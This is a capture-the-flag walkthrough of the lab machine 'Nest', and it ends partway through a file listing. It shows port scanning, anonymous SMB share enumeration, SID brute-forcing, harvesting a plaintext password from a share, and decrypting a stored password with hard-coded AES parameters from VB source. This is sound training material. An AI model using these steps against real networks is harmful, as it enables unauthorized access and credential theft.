Nest
Port scan
u505@naos:~/HTB/Machines/Nest$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.178
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-12-27 13:46:38 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 4386/tcp on 10.10.10.178
Discovered open port 445/tcp on 10.10.10.178
u505@naos:~/HTB/Machines/Nest$ nmap -sC -sV 10.10.10.178
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 08:46 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.39 seconds
Nmap thinks the machine is down because it does not answer the ping probes. We can force the scan with the -Pn option.
u505@naos:~/HTB/Machines/Nest$ nmap -Pn -sC -sV nest
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 08:47 EST
Nmap scan report for nest (10.10.10.178)
Host is up (0.038s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE       VERSION
445/tcp open  microsoft-ds?

Host script results:
|_clock-skew: 8m02s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-12-27T13:56:20
|_  start_date: 2020-12-27T13:49:40

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.92 seconds
An alternative to the -Pn switch is to run nmap as root, which enables ICMP probing.
As an unprivileged user, nmap's host discovery only looks for a TCP response on ports 80 or 443, and this server does not answer them (firewall drop?). When the scan is launched with sudo, nmap sends an ICMP echo request as well, and the host is detected.
u505@naos:~/HTB/Machines/Nest$ sudo nmap -sC -sV 10.10.10.178
[sudo] password for u505:
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 08:47 EST
Nmap scan report for nest (10.10.10.178)
Host is up (0.038s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE       VERSION
445/tcp open  microsoft-ds?

Host script results:
|_clock-skew: 8m02s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-12-27T13:56:05
|_  start_date: 2020-12-27T13:49:40

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.52 seconds
u505@naos:~/HTB/Machines/Nest$ sudo nmap -p 445,4386 -sC -sV 10.10.10.178
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 09:01 EST
Nmap scan report for nest (10.10.10.178)
Host is up (0.038s latency).

PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     Reporting Service V1.2
|     Unrecognised command
|   Help:
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.91%I=7%D=12/27%Time=5FE893C3%P=x86_64-pc-linux-gnu%r(N
SF:ULL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLi
SF:nes,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognis
SF:ed\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x
SF:20V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r
SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comm
SF:and\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r
SF:\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Rep
SF:orting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQ
SF:K\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,
SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows
SF:\x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20t
SF:he\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20--
SF:-\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r
SF:\nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\
SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCook
SF:ie,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSession
SF:Req,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,
SF:21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21
SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r
SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3
SF:A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x2
SF:0command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.
SF:2\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\
SF:.2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.
SF:2\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\
SF:r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20
SF:Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x
SF:20Reporting\x20Service\x20V1\.2\r\n\r\n>");

Host script results:
|_clock-skew: 8m02s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-12-27T14:12:15
|_  start_date: 2020-12-27T13:49:40

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 199.13 seconds
Port 4386 seems to run a custom, handmade service.
u505@naos:~/HTB/Machines/Nest$ telnet nest 4386
Trying 10.10.10.178...
Connected to nest.
Escape character is '^]'.

HQK Reporting Service V1.2

>help
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>quit
Was it something I said?
Connection closed by foreign host.
Unauthenticated enumeration
u505@naos:~/HTB/Machines/Nest$ smbmap -H 10.10.10.178
[+] IP: 10.10.10.178:445	Name: nest

u505@naos:~/HTB/Machines/Nest$ smbmap -u anonymous -H 10.10.10.178
[+] Guest session   	IP: 10.10.10.178:445	Name: nest
        Disk        Permissions	Comment
        ----        -----------	-------
        ADMIN$      NO ACCESS	Remote Admin
        C$          NO ACCESS	Default share
        Data        READ ONLY
        IPC$        NO ACCESS	Remote IPC
        Secure$     NO ACCESS
        Users       READ ONLY
Two shares, Data and Users, are readable without authentication.
u505@naos:~/HTB/Machines/Nest$ enum4linux 10.10.10.178
Enum4linux doesn't provide any useful information.
u505@naos:~/HTB/Machines/Nest$ crackmapexec smb 10.10.10.178/32
SMB 10.10.10.178 445 HTB-NEST [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
Build 7601 corresponds to Windows 7 Service Pack 1 or Windows Server 2008 R2 Service Pack 1.
u505@naos:~/HTB/Machines/Nest$ sudo crackmapexec smb 10.10.10.178/32 -u 'u505' -p abc --shares
[sudo] password for u505:
SMB 10.10.10.178 445 HTB-NEST [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB 10.10.10.178 445 HTB-NEST [+] HTB-NEST\u505:abc
SMB 10.10.10.178 445 HTB-NEST [+] Enumerated shares
SMB 10.10.10.178 445 HTB-NEST Share      Permissions  Remark
SMB 10.10.10.178 445 HTB-NEST -----      -----------  ------
SMB 10.10.10.178 445 HTB-NEST ADMIN$                  Remote Admin
SMB 10.10.10.178 445 HTB-NEST C$                      Default share
SMB 10.10.10.178 445 HTB-NEST Data       READ
SMB 10.10.10.178 445 HTB-NEST IPC$                    Remote IPC
SMB 10.10.10.178 445 HTB-NEST Secure$
SMB 10.10.10.178 445 HTB-NEST Users      READ
crackmapexec provides the same share information. Note that the arbitrary credentials u505:abc are reported as accepted, which is the guest-access behaviour already seen with smbmap.
Users
u505@naos:~/HTB/Machines/Nest$ python3 /opt/utils/impacket/examples/lookupsid.py u505:abc@10.10.10.178
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.178
[*] StringBinding ncacn_np:10.10.10.178[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3904039239-3573887098-1598508871
500: HTB-NEST\Administrator (SidTypeUser)
501: HTB-NEST\Guest (SidTypeUser)
513: HTB-NEST\None (SidTypeGroup)
1002: HTB-NEST\TempUser (SidTypeUser)
1004: HTB-NEST\C.Smith (SidTypeUser)
1005: HTB-NEST\Service_HQK (SidTypeUser)
Three regular users (TempUser, C.Smith and Service_HQK) are enumerated in addition to Administrator and Guest.
u505@naos:~/HTB/Machines/Nest$ crackmapexec smb 10.10.10.178/32 -u 'u505' -p abc --rid-brute
SMB 10.10.10.178 445 HTB-NEST [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB 10.10.10.178 445 HTB-NEST [+] HTB-NEST\u505:abc
SMB 10.10.10.178 445 HTB-NEST [+] Brute forcing RIDs
SMB 10.10.10.178 445 HTB-NEST 500: HTB-NEST\Administrator (SidTypeUser)
SMB 10.10.10.178 445 HTB-NEST 501: HTB-NEST\Guest (SidTypeUser)
SMB 10.10.10.178 445 HTB-NEST 513: HTB-NEST\None (SidTypeGroup)
SMB 10.10.10.178 445 HTB-NEST 1002: HTB-NEST\TempUser (SidTypeUser)
SMB 10.10.10.178 445 HTB-NEST 1004: HTB-NEST\C.Smith (SidTypeUser)
SMB 10.10.10.178 445 HTB-NEST 1005: HTB-NEST\Service_HQK (SidTypeUser)
Crackmapexec provides the same information.
Files enumeration
Mount shares
u505@naos:~/HTB/Machines/Nest$ mkdir -p mnt/data mnt/secure mnt/users
u505@naos:~/HTB/Machines/Nest$ cd mnt/
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/data data
Password for root@//10.10.10.178/data: *****
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/users users
Password for root@//10.10.10.178/users: *****
Search accessible files
u505@naos:~/HTB/Machines/Nest/mnt$ find . -type f -exec ls -l {} \;
find: './data/IT': Permission denied
find: './data/Production': Permission denied
find: './data/Reports': Permission denied
-rwxr-xr-x 1 root root 48 Aug 5 2019 './data/Shared/Maintenance/Maintenance Alerts.txt'
-rwxr-xr-x 1 root root 425 Aug 7 2019 './data/Shared/Templates/HR/Welcome Email.txt'
find: './users/Administrator': Permission denied
find: './users/C.Smith': Permission denied
find: './users/L.Frost': Permission denied
find: './users/R.Thompson': Permission denied
find: './users/TempUser': Permission denied
u505@naos:~/HTB/Machines/Nest/mnt$ cat "./data/Shared/Maintenance/Maintenance Alerts.txt"
There is currently no scheduled maintenance work
The next file contains credentials for the user TempUser.
u505@naos:~/HTB/Machines/Nest/mnt$ cat "./data/Shared/Templates/HR/Welcome Email.txt"
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019

Thank you
HR
Enumeration with user TempUser
u505@naos:~/HTB/Machines/Nest/mnt$ smbmap -u TempUser -p welcome2019 -H 10.10.10.178
[+] IP: 10.10.10.178:445	Name: nest
        Disk        Permissions	Comment
        ----        -----------	-------
        ADMIN$      NO ACCESS	Remote Admin
        C$          NO ACCESS	Default share
        Data        READ ONLY
        IPC$        NO ACCESS	Remote IPC
        Secure$     READ ONLY
        Users       READ ONLY
As TempUser, the hidden share Secure$ becomes readable.
u505@naos:~/HTB/Machines/Nest/mnt$ sudo crackmapexec smb 10.10.10.178/32 -u TempUser -p welcome2019 --shares
SMB 10.10.10.178 445 HTB-NEST [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB 10.10.10.178 445 HTB-NEST [+] HTB-NEST\TempUser:welcome2019
SMB 10.10.10.178 445 HTB-NEST [+] Enumerated shares
SMB 10.10.10.178 445 HTB-NEST Share      Permissions  Remark
SMB 10.10.10.178 445 HTB-NEST -----      -----------  ------
SMB 10.10.10.178 445 HTB-NEST ADMIN$                  Remote Admin
SMB 10.10.10.178 445 HTB-NEST C$                      Default share
SMB 10.10.10.178 445 HTB-NEST Data       READ
SMB 10.10.10.178 445 HTB-NEST IPC$                    Remote IPC
SMB 10.10.10.178 445 HTB-NEST Secure$    READ
SMB 10.10.10.178 445 HTB-NEST Users      READ
Crackmapexec provides the same information.
Files enumeration
Unmount the shares mounted without credentials.
u505@naos:~/HTB/Machines/Nest/mnt$ sudo umount data users
Mount shares with TempUser
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/data data -o "username=TempUser,password=welcome2019"
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/users users -o "username=TempUser,password=welcome2019"
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/secure$ secure -o "username=TempUser,password=welcome2019"
u505@naos:~/HTB/Machines/Nest/mnt$ find . -type f -exec ls -l {} \;
find: './secure/Finance': Permission denied
find: './secure/HR': Permission denied
find: './secure/IT': Permission denied
-rwxr-xr-x 1 root root 246 Aug 3 2019 ./data/IT/Configs/Adobe/editing.xml
-rwxr-xr-x 1 root root 0 Oct 10 2011 ./data/IT/Configs/Adobe/Options.txt
-rwxr-xr-x 1 root root 258 Jan 8 2013 ./data/IT/Configs/Adobe/projects.xml
-rwxr-xr-x 1 root root 1274 Aug 7 2019 ./data/IT/Configs/Adobe/settings.xml
-rwxr-xr-x 1 root root 1369 Jun 11 2003 ./data/IT/Configs/Atlas/Temp.XML
-rwxr-xr-x 1 root root 4598 Mar 3 2012 ./data/IT/Configs/Microsoft/Options.xml
-rwxr-xr-x 1 root root 6451 Aug 7 2019 ./data/IT/Configs/NotepadPlusPlus/config.xml
-rwxr-xr-x 1 root root 2108 Aug 7 2019 ./data/IT/Configs/NotepadPlusPlus/shortcuts.xml
-rwxr-xr-x 1 root root 270 Aug 8 2019 './data/IT/Configs/RU Scanner/RU_config.xml'
-rwxr-xr-x 1 root root 48 Aug 5 2019 './data/Shared/Maintenance/Maintenance Alerts.txt'
-rwxr-xr-x 1 root root 425 Aug 7 2019 './data/Shared/Templates/HR/Welcome Email.txt'
find: './users/Administrator': Permission denied
find: './users/C.Smith': Permission denied
find: './users/L.Frost': Permission denied
find: './users/R.Thompson': Permission denied
-rwxr-xr-x 1 root root 0 Aug 7 2019 './users/TempUser/New Text Document.txt'
In the Notepad++ configuration file, the recent-files history references a file under Secure$\IT\Carl.
u505@naos:~/HTB/Machines/Nest/mnt$ tail ./data/IT/Configs/NotepadPlusPlus/config.xml
<Find name="redeem on" />
<Find name="192" />
<Replace name="C_addEvent" />
</FindHistory>
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
</NotepadPlus>
The file RU_config.xml seems to contain c.smith's credentials for an LDAP service (Active Directory?).
u505@naos:~/HTB/Machines/Nest/mnt$ cat './data/IT/Configs/RU Scanner/RU_config.xml'
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
But the password appears to be encrypted: the base64 value decodes to 32 bytes that are not printable text.
u505@naos:~/HTB/Machines/Nest/mnt$ echo fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= | base64 -d | xxd
00000000: 7d31 3301 f603 a33d 58ce 4aa1 4241 fa19  }13....=X.J.BA..
00000010: 0158 2a9d 5763 9866 edb8 ce3f ceb2 6311  .X*.Wc.f...?..c.
Listing the IT folder of Secure$ returned permission denied, but its subfolder Carl (the path learned from the Notepad++ history) is accessible.
u505@naos:~/HTB/Machines/Nest/mnt$ cd secure/IT/Carl
u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ find . -type f -exec ls -l {} \;
-rwxr-xr-x 1 root root 56 Aug 7 2019 ./Docs/ip.txt
-rwxr-xr-x 1 root root 73 Aug 7 2019 ./Docs/mmc.txt
-rwxr-xr-x 1 root root 772 Aug 7 2019 './VB Projects/WIP/RU/RUScanner/ConfigFile.vb'
-rwxr-xr-x 1 root root 279 Aug 7 2019 './VB Projects/WIP/RU/RUScanner/Module1.vb'
-rwxr-xr-x 1 root root 441 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb'
-rwxr-xr-x 1 root root 481 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/My Project/Application.myapp'
-rwxr-xr-x 1 root root 1163 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb'
-rwxr-xr-x 1 root root 2776 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb'
-rwxr-xr-x 1 root root 5612 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/My Project/Resources.resx'
-rwxr-xr-x 1 root root 2989 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb'
-rwxr-xr-x 1 root root 279 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/My Project/Settings.settings'
-rwxr-xr-x 1 root root 4828 Aug 9 2019 './VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj'
-rwxr-xr-x 1 root root 143 Aug 6 2019 './VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user'
-rwxr-xr-x 1 root root 133 Aug 7 2019 './VB Projects/WIP/RU/RUScanner/SsoIntegration.vb'
-rwxr-xr-x 1 root root 4888 Aug 7 2019 './VB Projects/WIP/RU/RUScanner/Utils.vb'
-rwxr-xr-x 1 root root 871 Aug 6 2019 './VB Projects/WIP/RU/RUScanner.sln'
The file Utils.vb contains the encryption and decryption routines, with the passphrase, salt, IV and iteration count hard-coded.
u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ cat './VB Projects/WIP/RU/RUScanner/Utils.vb'
Imports System.Text
Imports System.Security.Cryptography

Public Class Utils

    Public Shared Function GetLogFilePath() As String
        Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
    End Function

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function EncryptString(PlainString As String) As String
        If String.IsNullOrEmpty(PlainString) Then
            Return String.Empty
        Else
            Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Encrypt(ByVal plainText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
        Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)
        Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8))
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes)
        Using memoryStream As New IO.MemoryStream()
            Using cryptoStream As New CryptoStream(memoryStream, _
                                                   encryptor, _
                                                   CryptoStreamMode.Write)
                cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length)
                cryptoStream.FlushFinalBlock()
                Dim cipherTextBytes As Byte() = memoryStream.ToArray()
                memoryStream.Close()
                cryptoStream.Close()
                Return Convert.ToBase64String(cipherTextBytes)
            End Using
        End Using
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        Return plainText
    End Function

End Class
User Flag
Create VB to decrypt password
Dotnet environment variables
u505@naos:/opt/utils/dotnet$ export DOTNET_ROOT=/opt/utils/dotnet
u505@naos:/opt/utils/dotnet$ export PATH=$PATH:$DOTNET_ROOT
Creation of a console VB project.
u505@naos:~/HTB/Machines/Nest$ mkdir VBu505
u505@naos:~/HTB/Machines/Nest$ cd VBu505
u505@naos:~/HTB/Machines/Nest/VBu505$ dotnet new console -lang vb
The template "Console Application" was created successfully.

Processing post-creation actions...
Running 'dotnet restore' on /opt/HTB/Machines/Nest/VBu505/VBu505.vbproj...
  Determining projects to restore...
  Restored /opt/HTB/Machines/Nest/VBu505/VBu505.vbproj (in 131 ms).

Restore succeeded.

An update for template pack Microsoft.DotNet.Common.ProjectTemplates.3.1::3.1.10 is available.
    install command: dotnet new -i Microsoft.DotNet.Common.ProjectTemplates.3.1::5.0.0
Inspired by the source code found previously, I created a decrypt function to decrypt the password.
u505@naos:~/HTB/Machines/Nest/VBu505$ cat Program.vb
Imports System
Imports System.Text
Imports System.Security.Cryptography

Public Class Utils

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        Return plainText
    End Function

End Class

Module Program
    Sub Main(args As String())
        Console.WriteLine(Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="))
    End Sub
End Module
We run the VB program:
u505@naos:~/HTB/Machines/Nest/VBu505$ dotnet run
xRxRxPANCAK3SxRxRx
The username and the decrypted password are accepted; the three shares Data, Secure$ and Users are readable.
u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ smbmap -u c.smith -p xRxRxPANCAK3SxRxRx -H 10.10.10.178
[+] IP: 10.10.10.178:445	Name: nest
        Disk        Permissions	Comment
        ----        -----------	-------
        ADMIN$      NO ACCESS	Remote Admin
        C$          NO ACCESS	Default share
        Data        READ ONLY
        IPC$        NO ACCESS	Remote IPC
        Secure$     READ ONLY
        Users       READ ONLY
crackmapexec confirms it too.
u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ sudo crackmapexec smb 10.10.10.178/32 -u c.smith -p xRxRxPANCAK3SxRxRx --shares
[sudo] password for u505:
SMB 10.10.10.178 445 HTB-NEST [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB 10.10.10.178 445 HTB-NEST [+] HTB-NEST\c.smith:xRxRxPANCAK3SxRxRx
SMB 10.10.10.178 445 HTB-NEST [+] Enumerated shares
SMB 10.10.10.178 445 HTB-NEST Share Permissions Remark
SMB 10.10.10.178 445 HTB-NEST ----- ----------- ------
SMB 10.10.10.178 445 HTB-NEST ADMIN$ Remote Admin
SMB 10.10.10.178 445 HTB-NEST C$ Default share
SMB 10.10.10.178 445 HTB-NEST Data READ
SMB 10.10.10.178 445 HTB-NEST IPC$ Remote IPC
SMB 10.10.10.178 445 HTB-NEST Secure$ READ
SMB 10.10.10.178 445 HTB-NEST Users READ
Files enumeration
Mount shares as c.smith
u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ cd ..
u505@naos:~/HTB/Machines/Nest/mnt/secure/IT$ cd ..
u505@naos:~/HTB/Machines/Nest/mnt/secure$ cd ..
u505@naos:~/HTB/Machines/Nest/mnt$ sudo umount data secure users
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/data data -o "username=c.smith,password=xRxRxPANCAK3SxRxRx"
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/users users -o "username=c.smith,password=xRxRxPANCAK3SxRxRx"
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/secure$ secure -o "username=c.smith,password=xRxRxPANCAK3SxRxRx"
Check files available
u505@naos:~/HTB/Machines/Nest/mnt$ find . -type f -exec ls -l {} \;
find: './secure/Finance': Permission denied
find: './secure/HR': Permission denied
find: './secure/IT': Permission denied
-rwxr-xr-x 1 root root 246 Aug 3 2019 ./data/IT/Configs/Adobe/editing.xml
-rwxr-xr-x 1 root root 0 Oct 10 2011 ./data/IT/Configs/Adobe/Options.txt
-rwxr-xr-x 1 root root 258 Jan 8 2013 ./data/IT/Configs/Adobe/projects.xml
-rwxr-xr-x 1 root root 1274 Aug 7 2019 ./data/IT/Configs/Adobe/settings.xml
-rwxr-xr-x 1 root root 1369 Jun 11 2003 ./data/IT/Configs/Atlas/Temp.XML
-rwxr-xr-x 1 root root 4598 Mar 3 2012 ./data/IT/Configs/Microsoft/Options.xml
